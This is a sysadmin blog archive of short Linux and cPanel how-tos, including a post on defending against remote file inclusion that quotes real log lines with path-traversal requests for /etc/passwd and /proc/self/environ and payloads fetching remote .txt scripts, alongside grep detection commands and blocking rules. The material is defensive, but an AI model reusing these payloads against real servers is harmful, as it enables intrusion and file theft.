Tuesday, September 27, 2016

Error: no C compiler found

When you are getting below error while compiling .

Configuring for  Linux-x86_64
Checking for gcc : No
Checking for cc : No
error: no C compiler found

try  

yum groupinstall "Development Tools"

After that you can try the compilation of Code Blocks again.



at No comments:

Monday, June 1, 2015

How to Reset a Wordpress Password

If you have forgotten your wordpress credentials, or possibly have had your wordpress install compromised; you may find yourself needing to change your admin username and/or password to regain access to your site.

Reset a User's password through MySQL
  • Log in to your wordpress database using MySQL's command line interface
  • Find the ID of the user's password you want to change
SELECT ID, user_login, user_pass FROM wp_users;
  • Change that user's password to a new one
UPDATE wp_users SET user_pass=MD5('newstrongpassword') WHERE ID = usersID;

Reset a User's Password through phpMyAdmin

If you have Plesk or cPanel, phpmyadmin should be included by default. Open it up for the domain and database that your wordpress site belongs on. If you don't remember the database name, look in your wp-config.php for a line similar to this:
define('DB_NAME', 'wordpress_blog');
In this example, "wordpress_blog" is the name of the database.
  • Once you're logged in to phpmyadmin, click on the wp_users table.
  • Make sure you are on the browse screen
  • Find the username you want to change the password for
  • Click edit on that username
  • Enter in your new password in the Value field of the user_pass line
  • Select "MD5" from the dropdown under the Functions column for the user_pass line
  • Click Go at the bottom of the screen, and then you should be able to log in with the new password
at No comments:

How to change the primary IP addres of a cPanel server



Log in to SSH, and do the following:

Edit /etc/sysconfig/network-scripts/ifcfg-eth0

Change the IPADDR and GATEWAY lines to match the new IP and Gateway for the new ip


Edit /etc/sysconfig/network
Change the GATEWAY line here if it does not exist in the ifcfg-* file.


Edit /etc/ips
Remove the new primary IP from this file if it is present
Add the old primary IP to this file with the format ::


Edit /var/cpanel/mainip
Replace the old primary IP with the new primary IP


Edit /etc/hosts
Replace the old primary IP with the new one if needed. The hostname's dns will need to be updated too


Restart the network service to make the new IP the primary
service network restart
Note: You're probably going to be disconnected at this point, and have to log in to ssh using the new primary ip.


Restart the ipaliases script to bring up the additional IP
service ipaliases restart


Run ifconfig and make sure all IPs show up correctly


Update the cpanel license to the new primary IP


Verify you can still log in to WHM and there is no license warning
Verify cPanel
at No comments:
Labels:

Tuesday, May 19, 2015

Linux Crontab

Linux Cron utility is an effective way to schedule a routine background job at a specific time and/or day on an on-going basis.

 Linux Crontab Format
MIN HOUR DOM MON DOW CMD
*        *           *        *       *         
Table: Crontab Fields and Allowed Ranges (Linux Crontab Syntax)
FieldDescriptionAllowed Value
MINMinute field0 to 59
HOURHour field0 to 23
DOMDay of Month1-31
MONMonth field1-12
DOWDay Of Week0-6
CMDCommandAny command to be executed.




at No comments:

Friday, November 14, 2014

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by including code from a URL to a remote server. When an application executes the malicious code, it may lead to a back-door exploit or technical information retrieval. This is an application vulnerability that is a result of insufficient validation of user inputs.



Disable allow_url_fopen in php.ini by setting it to 0

Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)

Lockdown the server environment to prevent the server from making new outbound requests

Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]

The RewriteCond will match the found pattern, and the RewriteRule determines where to redirect the attacker. Here, the F and L options will block the request.

There are two php.inioptions you can set, which control different aspects of file handling, and work to prevent RFI:

allow_url_fopen=off
allow_url_include=off

The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash, in GETs, POSTs and cookies. The other magic quote directive (magic_quotes_runtime=On) will escape quotes for a select list of functions.

Apache log poisoning with LFI




 Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages.

/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log


RFI Detection

Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.


grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~`
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com- "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~




grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"

grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"

grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

10.45.14.165 - example.com- "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com- "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"


With such a vulnerability, attackers can execute any binary on the server like starting a telnet server, logging in to it with the privileges of a Web server user, performing exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.


Reference

https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts

at No comments:

Wednesday, November 12, 2014

Linux command verifying CMS version on cPanel server

Wordpress version:
 find /home/*/public_html/ -type f -iwholename "*/wp-includes/version.php" -exec grep -H "\$wp_version =" {} \;


 Joomla! 1/2/3 version and release:
 Linux/cPanel:
find /home/*/public_html/ -type f \( -iwholename '*/libraries/joomla/version.php' -o -iwholename '*/libraries/cms/version.php' -o -iwholename '*/libraries/cms/version/version.php' \) -print -exec perl -e 'while (<>) { $release = $1 if m/ \$RELEASE\s+= .([\d.]+).;/; $dev = $1 if m/ \$DEV_LEVEL\s+= .(\d+).;/; } print qq($release.$dev\n);' {} \; && echo "-"

Drupal version
Linux/cPanel:
find /home/*/public_html/ -type f -iwholename "*/modules/system/system.info" -exec grep -H "version = \"" {} \;
 Linux/Plesk:
at No comments:
Labels:

Friday, October 31, 2014

How to prevent DoS attack on a cPanel server

Check and block wordpress and xmlrc attack on a cPanel server


if you are seeing a lot of access to wp-login.php , you can conclude it as a wordpress attack. The below script will show you the sorted list of accessing ip’s to wp-login


====
-----------

egrep 'wp-login.php' /usr/local/apache/domlogs/* | grep -v ftp_log | awk -F : '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

====
-----------
we can get the acces log IP from the below script,

grep -r "xx/Aug/2014" /usr/local/apache/domlogs/ | grep "xmlrpc.php" | awk '{ print $1 }' | cut -d : -f2 | sort | uniq -c | sort -n > /root/testwp

-----------
grep wp-login.php /usr/local/apache/domlogs/* grep “16/Jan/2013:03″|awk '{print $1}' | cut -d: -f2 | sort | uniq -c |sort -n | tail



CSF tuning 

vi /etc/csf/csf.conf
----
# To disable this feature, set this to 0
CT_LIMIT = "50"
----


Where 50 is the maximum number of connections from an IP address. You need to specify the port number also.



vi /etc/csf/csf.conf
----
# Leave this option empty to count all ports against CT_LIMIT
CT_PORTS = "80,53,22"
----


Also we can use other CT options .

CT_INTERVAL = "30"
CT_BLOCK_TIME = "1800"



IPTable rule:

iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

------------------------
-A : Append
-p : Protocol
--dport : For ports
-m limit : To limit iptables extension
--limit 25/minute : Defines maximum of 25 connection per minute.
--limit-burst 100 : The limit/minute will be enforced only after the total number of connection have reached the limit-burst level, ie 100 here
-j : Target

--------------------------






at No comments:
Subscribe to: Posts (Atom)